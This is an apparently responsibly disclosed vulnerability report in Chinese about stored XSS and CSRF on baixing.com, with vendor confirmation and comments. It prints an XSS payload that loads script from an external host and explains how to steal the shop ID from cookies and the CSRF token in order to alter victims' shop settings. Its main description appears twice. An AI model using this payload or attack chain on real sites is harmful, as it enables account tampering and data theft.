漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百姓网存储型XSS+CSRF可获取用户隐私更改店铺数据等(主站及所有地方子站均存在问题)
提交时间:2014-10-14 22:21
修复时间:2014-11-28 22:22
公开时间:2014-11-28 22:22
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-28: 细节向公众公开
简要描述:
百姓网态度挺好的,送的礼物也很真诚 于是我又来了第二发。谢谢你们送的《文明之光》
详细说明:
首先问题出在发一个帖子的标题处虽然限制了25个字符,未过滤字符,但是还有各种姿势可以XSS!
payload : '"><script src=//㎦.㎺>/*
虽然标题处过滤了但是打开源文件 还是可以看到在其他地方的输出没有过滤!
可以看到这里成功的加载了我们的代码,但是现在还没到主站的WWW域,一些重要操作的Token可是放在WWW域呢。
经过测试发现,开通一个微店,你发布的所有帖子 也会在微店出现,而微店正好是WWW域。
我们来看下微店里过滤我们的Payload没。
首先打开我的微店:
发现有的内容没加载出来,那么应该是有问题的。于是便打开源码:
可以看到虽然过滤了几处,但是输出点比较多,有的地方没过滤,于是我们现在在WWW域又有一个XSS了。
那么我们现在可以干嘛呢?
可以看到有很多重要操作全部在WWW.BAIXING.COM
包括店铺设置,发出的职位,收到的简历 以及账户明细之类的!
那么我们可不可以csrf来篡改数据跟获得数据呢?答案是肯定的。(前提是你要能拿到操作的token)!
我们就拿更改店铺设置来开刀吧,首先先设置自己的店铺抓个包:
可以看到打红框的地方就是我们的店铺名,店铺描述与店铺地址。没打红框的就是token跟店铺id!
如果我们要更改店铺的设置那么token跟店铺id是必须的,我们怎么去获得呢?
首先我发现店铺id在cookie里,而且没做httponly 那么我们是可以获取到的。
那么我们如何获得他呢?
如果cookie里存在__u 这个cookie,那么就是用正则表达式或得到,然后转为String类型,然后去掉 __u=" 以及 " 剩下的就是店铺ID了。
现在关键的店铺ID获得到了,剩下的就是另外一个关键了Token。
我们首先来到设置页面 打开源文件 直接搜索token:
可以看到token被放在一个隐藏的input里了,不过没事 现在我们开始来获得他!
首先创建个ajax函数,然后使用GET方法去请求设置页面,然后设置回调函数,如果有返回值,那么便用正则匹配或得到,然后转String类型 去掉 value=" 以及 " 剩下的就是token了!
好,这些都获得到了,那我们现在开始写payload:
这个就是我们最终的Payload,他拥有这么些功能,CSRF加店铺关注,获得店铺ID,token,更改店铺设置。
现在我们来看下效果。
本身是没有关注我们的店铺的:
触发XSS后:
本身店铺设置是这样的:
触发XSS后是这样的:
我们来看下发送的数据包:
可以看到全是更改店铺设置的包,因为0.5秒就会执行一次。
为什么要这样,因为你不知道客户端的网速他去获得一次token要多久,然后我就每0.5秒执行一次了!
我修复截图的注释一下 不是每五秒更改次设置 是每零点五秒。。一下粗心 打快了,也懒得改了!
漏洞证明:
微店地址:www.baixing.com/weishop/w112955608.html
访问就会关注我的微店,如果你有店铺则会更改你的设置。
首先问题出在发一个帖子的标题处虽然限制了25个字符,未过滤字符,但是还有各种姿势可以XSS!
payload : '"><script src=//㎦.㎺>/*
虽然标题处过滤了但是打开源文件 还是可以看到在其他地方的输出没有过滤!
可以看到这里成功的加载了我们的代码,但是现在还没到主站的WWW域,一些重要操作的Token可是放在WWW域呢。
经过测试发现,开通一个微店,你发布的所有帖子 也会在微店出现,而微店正好是WWW域。
我们来看下微店里过滤我们的Payload没。
首先打开我的微店:
发现有的内容没加载出来,那么应该是有问题的。于是便打开源码:
可以看到虽然过滤了几处,但是输出点比较多,有的地方没过滤,于是我们现在在WWW域又有一个XSS了。
那么我们现在可以干嘛呢?
可以看到有很多重要操作全部在WWW.BAIXING.COM
包括店铺设置,发出的职位,收到的简历 以及账户明细之类的!
那么我们可不可以csrf来篡改数据跟获得数据呢?答案是肯定的。(前提是你要能拿到操作的token)!
我们就拿更改店铺设置来开刀吧,首先先设置自己的店铺抓个包:
可以看到打红框的地方就是我们的店铺名,店铺描述与店铺地址。没打红框的就是token跟店铺id!
如果我们要更改店铺的设置那么token跟店铺id是必须的,我们怎么去获得呢?
首先我发现店铺id在cookie里,而且没做httponly 那么我们是可以获取到的。
那么我们如何获得他呢?
如果cookie里存在__u 这个cookie,那么就是用正则表达式或得到,然后转为String类型,然后去掉 __u=" 以及 " 剩下的就是店铺ID了。
现在关键的店铺ID获得到了,剩下的就是另外一个关键了Token。
我们首先来到设置页面 打开源文件 直接搜索token:
可以看到token被放在一个隐藏的input里了,不过没事 现在我们开始来获得他!
首先创建个ajax函数,然后使用GET方法去请求设置页面,然后设置回调函数,如果有返回值,那么便用正则匹配或得到,然后转String类型 去掉 value=" 以及 " 剩下的就是token了!
好,这些都获得到了,那我们现在开始写payload:
这个就是我们最终的Payload,他拥有这么些功能,CSRF加店铺关注,获得店铺ID,token,更改店铺设置。
现在我们来看下效果。
本身是没有关注我们的店铺的:
触发XSS后:
本身店铺设置是这样的:
触发XSS后是这样的:
我们来看下发送的数据包:
可以看到全是更改店铺设置的包,因为0.5秒就会执行一次。
为什么要这样,因为你不知道客户端的网速他去获得一次token要多久,然后我就每0.5秒执行一次了!
我修复截图的注释一下 不是每五秒更改次设置 是每零点五秒。。一下粗心 打快了,也懒得改了!
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-10-15 10:33
厂商回复:
多谢 0x_Jin。
最新状态:
暂无
漏洞评价:
评论
-
2014-10-14 22:25 |
0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)
-
2014-10-14 22:25 |
爱上平顶山 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)
-
2014-10-15 11:12 |
ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)